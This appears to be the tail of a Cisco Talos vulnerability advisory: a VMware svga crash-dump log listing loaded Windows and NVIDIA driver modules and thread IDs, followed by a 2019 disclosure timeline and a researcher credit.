2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6a20000 size 0x0x000a2000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x000a9f48 timestamp 0xaaba4fa9
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\clbcatq.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 2001.12.10941.16384
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc80e0000 size 0x0x00011000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x0000bb8c timestamp 0x80ed95b9
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\wbem\wbemprox.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc8050000 size 0x0x00085000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x000821c7 timestamp 0x264de62a
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\wbemcomn.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc5e40000 size 0x0x00014000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x00015c08 timestamp 0x42167f4e
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\wbem\wbemsvc.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc5e60000 size 0x0x000f1000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x000f6195 timestamp 0xc27bfeee
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\wbem\fastprox.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd74f0000 size 0x0x00008000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x00009082 timestamp 0x43f78f9f
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\psapi.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdbe270000 size 0x0x001ed000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x001d72c0 timestamp 0x05f0e9a4
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\dbghelp.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6d70000 size 0x0x0016a000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x0016bce2 timestamp 0x6fda36d1
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\msctf.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.348
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd4af0000 size 0x0x00058000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x0005f200 timestamp 0xd1e21847
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\winsta.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc3590000 size 0x0x00066000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x00061b53 timestamp 0x9ff9e1ff
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\SensorsApi.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.168
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc56a0000 size 0x0x00024000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x00023855 timestamp 0xabdcae8a
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\SensorsNativeApi.V2.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc79c0000 size 0x0x0001e000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x00021e5c timestamp 0xbbb5f881
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\SensorsUtilsV2.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.383+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd1b80000 size 0x0x001a8000
2019-04-16T12:12:57.383+02:00| svga| I125: checksum 0x001b32e3 timestamp 0x70304c01
2019-04-16T12:12:57.383+02:00| svga| I125: image file C:\Windows\System32\propsys.dll
2019-04-16T12:12:57.383+02:00| svga| I125: file version 7.0.17763.348
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdb49d0000 size 0x0x00030000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x00032b59 timestamp 0x91d63955
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\PortableDeviceTypes.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc1540000 size 0x0x00036000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x0003e09f timestamp 0x2c0d51d2
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\deviceaccess.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6290000 size 0x0x00059000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x0005ee01 timestamp 0xd51e499a
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\wintrust.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.348
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd3aa0000 size 0x0x0002e000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x000380b6 timestamp 0xb90c6519
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\dwmapi.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd1020000 size 0x0x0000a000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x000100e7 timestamp 0xb11b88e5
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\version.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7170000 size 0x0x0001d000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x000270f8 timestamp 0x00e30045
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\imagehlp.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc00b0000 size 0x0x002ae000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x002b11fb timestamp 0x5ca37760
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\nvspcap64.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 3.18.0.102
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc7ce0000 size 0x0x000ad000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x000a8b32 timestamp 0x700dafec
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\mscms.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5290000 size 0x0x00028000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x0002961f timestamp 0xbbcbf3a2
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\userenv.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdcde10000 size 0x0x00010000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x0000eeb8 timestamp 0xb5672678
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\ColorAdapterClient.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdb4950000 size 0x0x00043000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x0004a1f9 timestamp 0xa5d2ba3f
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\icm32.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd2770000 size 0x0x0027e000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x0028c849 timestamp 0x13a31007
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\d3d11.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd40e0000 size 0x0x000c2000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x000c506d timestamp 0x6b3e2414
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\dxgi.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdcf690000 size 0x0x000ee000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x000ef76f timestamp 0x5cac804c
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\DriverStore\FileRepository\nv_dispwi.inf_amd64_b299c2f3f9b29d45\nvldumdx.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 25.21.14.2531
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdca610000 size 0x0x025b5000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x025b9b1a timestamp 0x5cac87c1
2019-04-16T12:12:57.385+02:00| svga| I125: image file C:\Windows\System32\DriverStore\FileRepository\nv_dispwi.inf_amd64_b299c2f3f9b29d45\nvwgf2umx_cfg.dll
2019-04-16T12:12:57.385+02:00| svga| I125: file version 25.21.14.2531
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: including module base 0x0x7ffdbe240000 size 0x0x0002a000
2019-04-16T12:12:57.385+02:00| svga| I125: checksum 0x0003488c timestamp 0x590c013e
2019-04-16T12:12:57.385+02:00| svga| I125: image file C:\Windows\System32\dbgcore.dll
2019-04-16T12:12:57.385+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 11992
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 12052
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 8708
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 10080
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 9268
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 15336
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 12324
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 15232
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 14148
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 10664
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 12840
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 15136
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 11244
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 4364
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 4192
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 14008
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 12424
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 4444
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 8984
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 14772
2019-04-29 - Vendor Disclosure
2019-08-02 - Vendor Patched; Public Release
Discovered by Piotr Bania of Cisco Talos.